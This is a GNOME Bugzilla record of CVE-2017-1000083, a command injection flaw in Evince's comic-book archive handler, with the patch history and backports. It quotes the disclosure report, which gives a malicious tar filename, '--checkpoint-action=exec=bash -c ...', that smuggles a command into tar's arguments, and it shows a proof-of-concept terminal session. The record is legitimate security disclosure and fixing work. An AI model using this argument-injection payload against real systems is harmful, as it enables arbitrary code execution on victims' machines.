After an evaluation, GNOME has moved from Bugzilla to GitLab. Learn more about GitLab.
No new issues can be reported in GNOME Bugzilla anymore.
To report an issue in a GNOME project, go to GNOME GitLab.
Do not go to GNOME Gitlab for: Bluefish, Doxygen, GnuCash, GStreamer, java-gnome, LDTP, NetworkManager, Tomboy.
Bug 784630 - (CVE-2017-1000083) (CVE-2017-1000083) Evince command injection vulnerability in CBT handler
(CVE-2017-1000083)
(CVE-2017-1000083) Evince command injection vulnerability in CBT handler
Status: RESOLVED FIXED
Product: evince
Classification: Core
Component: backends
3.24.x
Other Linux
: Normal critical
: ---
Assigned To: Evince Maintainers
Evince Maintainers
Depends on:
Blocks:
 
 
Reported: 2017-07-06 18:06 UTC by Michael Catanzaro
Modified: 2017-07-17 14:51 UTC
See Also:
GNOME target: ---
GNOME version: ---


Attachments
comics: Remove support for tar and tar-like commands (4.54 KB, patch)
2017-07-06 18:14 UTC, Bastien Nocera
none Details | Review
comics: Remove support for tar and tar-like commands (4.87 KB, patch)
2017-07-06 18:18 UTC, Bastien Nocera
none Details | Review
comics: Remove support for tar and tar-like commands (5.13 KB, patch)
2017-07-07 08:27 UTC, Bastien Nocera
none Details | Review
Backport of the patch to 3.20.1 (5.02 KB, patch)
2017-07-13 10:26 UTC, Adrien Plazas
none Details | Review
Backport of the patch to 3.20.1 (5.00 KB, patch)
2017-07-13 10:35 UTC, Adrien Plazas
none Details | Review
Backport of the patch to 3.10.3 (3.50 KB, patch)
2017-07-13 10:51 UTC, Adrien Plazas
none Details | Review

Description Michael Catanzaro 2017-07-06 18:06:27 UTC
From the folks at Project Zero:

"""
Hi,

The comic book backend in evince 3.24.0 is vulnerable to a command injection bug that can be used to execute arbitrary commands when a cbt file is opened:

cbt files are simple tar archives containing images. When a cbt file is processed, evince calls 
"tar -xOf $archive $filename" for every image file in the archive:

// backend/comics/comics-document.c: 914
        command_line = g_strdup_printf ("%s %s %s",
                                        comics_document->extract_command,
                                        quoted_archive,
                                        quoted_filename);

While both the archive name and the filename are quoted to not be interpreted by the shell,
the filename is completely attacker controlled an can start with "--" which leads to tar interpreting it
as a command line flag. 

This can be exploited by creating a tar archive with an embedded file named something
like this: "--checkpoint-action=exec=bash -c 'touch ~/covfefe.evince;'.jpg"

(Make sure evince is not sandboxed by apparmor before trying to reproduce the attached POC)

fwilhelm@box $ tar -tf poc.cbt
--checkpoint-action=exec=bash -c 'touch ~/covfefe.evince;'.jpg
fwilhelm@box $ ls -la ~/covfefe.evince
ls: cannot access covfefe.evince: No such file or directory
fwilhelm@box $ evince poc.cbt
fwilhelm@box $ ls -la ~/covfefe.evince
-rw-r----- 1 fwilhelm eng 0 Jun 28 11:05 /home/fwilhelm/covfefe.evince

An easy way to fix this would be to change the  ComicBookDecompressCommand entry for tar to 
{"%s -xOf --"          , "%s -tf -- %s"      , NULL             , FALSE, NO_OFFSET}

Please credit Felix Wilhelm from the Google Security Team in all releases, patches and advisories related to this issue.

Best,
Felix
"""

And also, importantly:

"""
I've also realized that my patch suggestion does not work as intended due to the weird command line
parsing of tar. Sorry about that.
"""
Comment 1 Michael Catanzaro 2017-07-06 18:10:25 UTC
Note that this can presumably be triggered by the evince thumbnailer, which is not sandboxed. And that web browsers that allow untrusted websites to auto-downloading files without user interaction (Chrome, Epiphany) can trigger the thumbnailer to run. So this is web exposed.
Comment 2 Bastien Nocera 2017-07-06 18:14:52 UTC
Created attachment 355036 [details] [review]
comics: Remove support for tar and tar-like commands

When handling tar files, or using a command with tar-compatible syntax,
to open comic-book archives, both the archive name (the name of the
comics file) and the filename (the name of a page within the archive)
are quoted to not be interpreted by the shell.

But the filename is completely with the attacker's control and can start
with "--" which leads to tar interpreting it as a command line flag.

This can be exploited by creating a CBT file (a tar archive with the
.cbt suffix) with an embedded file named something like this:
"--checkpoint-action=exec=bash -c 'touch ~/hacked;'.jpg"

Discovered by Felix Wilhelm from the Google Security Team.
Comment 3 Bastien Nocera 2017-07-06 18:18:22 UTC
Created attachment 355038 [details] [review]
comics: Remove support for tar and tar-like commands

When handling tar files, or using a command with tar-compatible syntax,
to open comic-book archives, both the archive name (the name of the
comics file) and the filename (the name of a page within the archive)
are quoted to not be interpreted by the shell.

But the filename is completely with the attacker's control and can start
with "--" which leads to tar interpreting it as a command line flag.

This can be exploited by creating a CBT file (a tar archive with the
.cbt suffix) with an embedded file named something like this:
"--checkpoint-action=exec=bash -c 'touch ~/hacked;'.jpg"

CBT files are infinitly rare (CBZ is usually used for DRM-free
commercial releases, CBR for those from more dubious provenance), so
removing support is the easiest way to avoid the bug triggering. All
this code was rewritten in the development release for GNOME 3.26 to not
shell out to any command, closing off this particular attack vector.

Discovered by Felix Wilhelm from the Google Security Team.
Comment 4 Michael Catanzaro 2017-07-06 19:30:59 UTC
Review of attachment 355038 [details] [review]:

Looks good.

I'll use accepted-commit_after_freeze to refer to coordinated disclosure.
Comment 5 Bastien Nocera 2017-07-07 08:27:40 UTC
Created attachment 355062 [details] [review]
comics: Remove support for tar and tar-like commands

When handling tar files, or using a command with tar-compatible syntax,
to open comic-book archives, both the archive name (the name of the
comics file) and the filename (the name of a page within the archive)
are quoted to not be interpreted by the shell.

But the filename is completely with the attacker's control and can start
with "--" which leads to tar interpreting it as a command line flag.

This can be exploited by creating a CBT file (a tar archive with the
.cbt suffix) with an embedded file named something like this:
"--checkpoint-action=exec=bash -c 'touch ~/hacked;'.jpg"

CBT files are infinitely rare (CBZ is usually used for DRM-free
commercial releases, CBR for those from more dubious provenance), so
removing support is the easiest way to avoid the bug triggering. All
this code was rewritten in the development release for GNOME 3.26 to not
shell out to any command, closing off this particular attack vector.

This also removes the ability to use libarchive's bsdtar-compatible
binary for CBZ (ZIP), CB7 (7zip), and CBR (RAR) formats. The first two
are already supported by unzip and 7zip respectively. libarchive's RAR
support is limited, so unrar is a requirement anyway.

Discovered by Felix Wilhelm from the Google Security Team.
Comment 6 Bastien Nocera 2017-07-07 13:45:21 UTC
On gnome-3-20 you'll also need to cherry-pick:
335c0536c137a8bcc886ca33c1aba6abaf32b99c
and
f932396d1c51646a1535eb28d7c8b1281e794a1a

Patch above applies cleanly after that.
Comment 7 Tobias Mueller 2017-07-10 16:52:08 UTC
FTR: This hsa been assigned CVE-2017-1000083.
Comment 8 Bastien Nocera 2017-07-11 15:09:37 UTC
Embargo date is Thursday 13th July 2017, 12:00 UTC.
Comment 9 Adrien Plazas 2017-07-13 10:26:37 UTC
Created attachment 355498 [details] [review]
Backport of the patch to 3.20.1
Comment 10 Adrien Plazas 2017-07-13 10:35:55 UTC
Created attachment 355499 [details] [review]
Backport of the patch to 3.20.1
Comment 11 Adrien Plazas 2017-07-13 10:51:38 UTC
Created attachment 355500 [details] [review]
Backport of the patch to 3.10.3
Comment 12 Bastien Nocera 2017-07-13 12:33:17 UTC
The bug is fixed in the gnome-3-20, gnome-3-22 and gnome-3-24 branches, for distributions to cherry pick, or backport to older versions.
Comment 13 Bastien Nocera 2017-07-17 14:51:17 UTC
There was a typo in configure.ac leading to a warning when installing the software (through a package or from source). It's innocuous though:
https://bugzilla.gnome.org/show_bug.cgi?id=785026